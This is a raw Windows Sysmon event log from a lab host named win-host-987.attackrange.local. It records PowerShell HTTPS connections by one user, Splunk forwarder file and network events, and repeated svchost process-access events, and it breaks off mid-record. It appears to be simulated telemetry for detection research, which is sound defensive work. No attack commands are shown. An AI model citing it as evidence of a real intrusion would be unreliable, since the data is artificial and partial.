AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56630-false10.0.1.12-8000- 354300x800000000000000035084619Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:12.108{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56629-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084621Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:48.002{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F80E0A56DA7DB4912FBAD72226E303ED,SHA256=457CD7C3ECC6FBAFFCCDFC28479E38C70AC5DDD1E95F3AD4B793D2E70A147B29,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084622Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:49.032{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D99901A36D8D110920F8059D1F8279F7,SHA256=63AB0FFB4C6C6689530CD3EECD899A3C1E4C2B7305A20AC43083EEBAF1F0E887,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084623Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:50.047{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A88319091CE9F6982230C904E54CDD44,SHA256=FC0E3A4EA447AA111D29D5088A900166EFB9C4CB1138C639437B33E07676FCA5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084624Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:51.064{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AA454C6915D8DA01A935A14C1583A6D,SHA256=988F714C3029A70D07EED5AEC33C1ABE1E16207B97F2E39CD43646D76A484B0B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084625Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:52.084{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C4E4FDF894E35B7B4DB5B4B1BE5B62F,SHA256=FD0BE511C1DE863CA6BA5A7DC736CB0437C54DDBA6A11FFB5AF5FA573687892C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084627Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:53.130{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=34CE05E9A8BC32B59B30372D96B22FB3,SHA256=7243ACA09B1239F4A24B09542A4B301C4A166E08A05C424D029A5CA56F4D47B1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084626Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:53.099{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CE61387282A0B10531AAB27A967E187,SHA256=BA78870BA68DE5ACA1EDF3AC6E7CA12B262B86103C88DF451513DC98137BC29A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084631Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:54.866{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084630Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:18.119{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56632-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035084629Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:18.103{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56631-false10.0.1.12-8000- 23542300x800000000000000035084628Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:54.129{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D6906A910C9B7A9D3863E5E394CBFCC,SHA256=D93586C6F622395F73A93346D186C9FCFB94160B1EC7D0C954E582B3673BE5A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084632Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:55.144{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BCD5F07A81E332D22F91A80602A7CA4,SHA256=59D7FAE88169AF9EC3BE69B8C29D120CCDDCDD501BD534930F16FCDD67C8DCC5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084634Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:20.864{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56633-false10.0.1.12-8089- 23542300x800000000000000035084633Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:56.161{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA374E639259C806F4E9778C33A02B15,SHA256=9729AB1669DB94B0913BA436CCB97A571C68507FC115F9E331EFDCE32AC9503A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084638Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:57.179{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAFF11581ED2DDFBFDF1FA799C692804,SHA256=EFCBEEDE762AAC8C9B949A83C433A8723D9239EF1BEE963BC751E42FB2E5128F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084637Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:57.142{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D4229FF2876F05DF467962C8A1BC5512,SHA256=7FA28CDF05C03A5BE1B3C0F4E5A65BB995EE9E076BD2915D3FCC5AFA0AA24B32,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084636Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:57.011{B81B27B7-4012-611D-0D00-00000000C801}7922908C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084635Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:57.011{B81B27B7-4012-611D-0D00-00000000C801}7922908C:\Windows\system32\svchost.exe{B81B27B7-429F-611D-0601-00000000C801}5536C:\Windows\system32\ServerManager.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084641Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:58.978{B81B27B7-4012-611D-0D00-00000000C801}7922908C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035084640Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:22.131{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56634-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084639Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:58.194{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09E54D340BE97CE78CB682897BCA4933,SHA256=55C5FDCC6E6FB17DB7DCF8A0DCCF460318B8D60BFC3B7F284AB33EA7EE5AF647,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084643Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:23.178{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56635-false10.0.1.12-8000- 23542300x800000000000000035084642Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:59.224{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=562AAB74501856978C47ADB73C86ACE9,SHA256=7B8BF90772256BE9D66EC5743D2638A2EBA63354BB6C8B2A5E931A7ABE062804,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084673Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.776{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27BB78C3E83788DE7A62BA4D757BADD0,SHA256=5B7929CA9756F955545A32E0BE9984680358BB06896071422D645F4A4771DEB0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084672Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.058{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084671Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.058{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084670Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.057{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084669Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.057{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084668Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.057{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084667Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.057{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084666Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.057{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084665Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.057{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084664Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.057{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084663Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.057{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084662Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.057{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084661Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.057{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084660Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.057{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084659Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.057{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084658Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.057{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084657Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.057{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084656Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.056{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084655Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 